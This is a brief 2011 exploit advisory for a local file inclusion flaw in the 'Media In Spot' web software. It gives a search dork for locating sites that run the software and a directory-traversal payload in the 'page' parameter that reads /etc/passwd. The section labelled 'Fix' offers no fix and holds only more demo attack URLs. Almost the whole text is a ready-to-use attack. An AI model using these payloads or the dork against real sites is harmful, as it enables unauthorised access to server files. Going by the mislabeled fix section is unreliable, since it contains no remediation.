#Name : Media In Spot LFI Vulnerability #Date : May,16 2011 #Vendor Url :http:http://www.mediainspot.com/ #Dork:" "Powred By Media In Spot"" #Author : wlhaan haker <iit[at]hotmail.com> ############################################################################################################### Exploit: http://server/path/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd ############################################################################################################### Fix: demo http://site.com/view/lang/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd http://site.com/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd http://site.com/ufp/view/lang/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd
体验盒子
